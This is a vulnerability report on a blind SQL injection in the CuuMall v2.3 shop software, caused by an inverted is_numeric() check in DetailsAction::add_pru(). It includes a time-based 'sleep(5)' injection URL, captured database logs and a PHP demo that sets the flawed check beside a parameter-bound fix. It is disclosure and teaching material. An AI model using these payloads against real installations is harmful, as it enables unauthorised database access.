### Brief description: SQL injection in the latest version of CuuMall

### Details:

I wonder whether the files on the CuuMall official site have been tampered with, or whether this is simply a bug in the product itself. Without further ado, straight to the code, DetailsAction.class.php (lines 282-313):

```php
public function add_pru( )
{
    $coo = new Cookie( );
    if ( $coo->is_set( c( "GUESTCOOK" )."mall-m-name" ) ) {
        $this->assign( "waitSceond", 3 );
        $this->assign( "jumpUrl", "__APP__/Home/login" );
        $this->error( "请登录后收藏商品" );   // "Please log in before adding the item to favourites"
        exit( );
    }
    $id = $_GET['id'];
    // Inverted check: a numeric id is rejected as "非法参数" (illegal parameter),
    // while any non-numeric string passes through untouched.
    if ( is_numeric( $id ) ) {
        $this->assign( "waitSceond", 3 );
        $this->assign( "jumpUrl", "__APP__" );
        $this->error( "非法参数" );
        exit( );
    }
    $addpru = new Model( "m_add" );
    // $id is concatenated straight into the WHERE clause, with no quoting or binding.
    $d_addpru = $addpru->where( "pruid=".$id )->find( );
    if ( empty( $d_addpru ) ) {
```

The check here treats a numeric value as an illegal parameter, when by any normal logic it is the non-numeric value that should be rejected. Because the test is inverted, anything that is not a plain number flows unchanged into `$addpru->where( "pruid=".$id )->find( )`, which gives a blind SQL injection.

Visit:

192.168.10.70/cuumall_v2.3/v2.3/mall_upload/index.php/home/detail/index/id/2 and sleep(5)#

A delayed response is enough to confirm it. The SQL captured from the database log on the backend:

```
2014/9/30 10:37 SELECT * FROM `cuu_sell_id` WHERE pro_id=1 and sleep(5)
2014/9/30 10:37 SELECT * FROM `cuu_pl_id` WHERE pro_id=1 and sleep(5)
```

followed by a whole pile of sleep() queries like these.

### Proof of vulnerability:
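To make the inverted check and its fix concrete, here is an added example that is not CuuMall's code and not a vendor patch. `mall_where_vulnerable()` reproduces the shape of the test in `add_pru()` (reject numeric, concatenate everything else); `mall_where_fixed()` is a hypothetical hardened replacement that accepts only an unsigned integer literal and returns an array condition so the value is bound rather than interpolated. The table `m_add`, its rows and the inputs are constructed for the demo; it runs against an in-memory SQLite database through PDO (needs the `pdo_sqlite` extension), and because SQLite has no `sleep()`, a tautology stands in for the time-based payload from the report.

```php
<?php
// Added example, not CuuMall's code. Mirrors the check in DetailsAction::add_pru()
// next to a hypothetical hardened version; table, rows and inputs are constructed.
declare(strict_types=1);

// Vulnerable: keeps the inverted is_numeric() test from the report. A numeric id
// is rejected, anything else is concatenated straight into the WHERE clause.
function mall_where_vulnerable(string $id): ?string
{
    if (is_numeric($id)) {
        return null;           // "非法参数": the legitimate input is the one that gets blocked
    }
    return "pruid=" . $id;     // attacker-controlled SQL fragment
}

// Hardened (assumed fix): only an unsigned integer literal passes, and the value
// is returned as an array condition for the framework to bind. ctype_digit() is
// stricter than is_numeric(), which also accepts "1e3", " 1" and "1.5".
function mall_where_fixed(string $id): ?array
{
    if (!ctype_digit($id) || strlen($id) > 10) {
        return null;           // same error path as the original, now for bad input
    }
    return ['pruid' => (int) $id];
}

// In-memory stand-in for the m_add table (constructed data).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE m_add (id INTEGER PRIMARY KEY, pruid INTEGER, uid INTEGER)');
$pdo->exec('INSERT INTO m_add (pruid, uid) VALUES (1, 10), (2, 11), (3, 12)');

// A legitimate id and an injected expression of the kind used in the report.
$inputs = ['2', '2 or 1=1 --'];

foreach ($inputs as $in) {
    $vuln = mall_where_vulnerable($in);
    if ($vuln === null) {
        echo "vulnerable check: '$in' rejected\n";
    } else {
        // Raw concatenation, exactly as where("pruid=".$id) does it.
        $rows = $pdo->query("SELECT * FROM m_add WHERE $vuln")->fetchAll(PDO::FETCH_ASSOC);
        echo "vulnerable check: '$in' accepted, rows returned: " . count($rows) . "\n";
    }

    $fixed = mall_where_fixed($in);
    if ($fixed === null) {
        echo "fixed check:      '$in' rejected\n";
    } else {
        // Bound parameter: the value can never change the query's structure.
        $stmt = $pdo->prepare('SELECT * FROM m_add WHERE pruid = :pruid');
        $stmt->execute([':pruid' => $fixed['pruid']]);
        $rows = $stmt->fetchAll(PDO::FETCH_ASSOC);
        echo "fixed check:      '$in' accepted, rows returned: " . count($rows) . "\n";
    }
}
```

Running it shows the two checks behaving in opposite ways: the vulnerable version rejects the legitimate `2` and accepts `2 or 1=1 --`, which returns all three rows; the hardened version accepts `2` (one row, through a bound parameter) and rejects the injected string before it reaches the database.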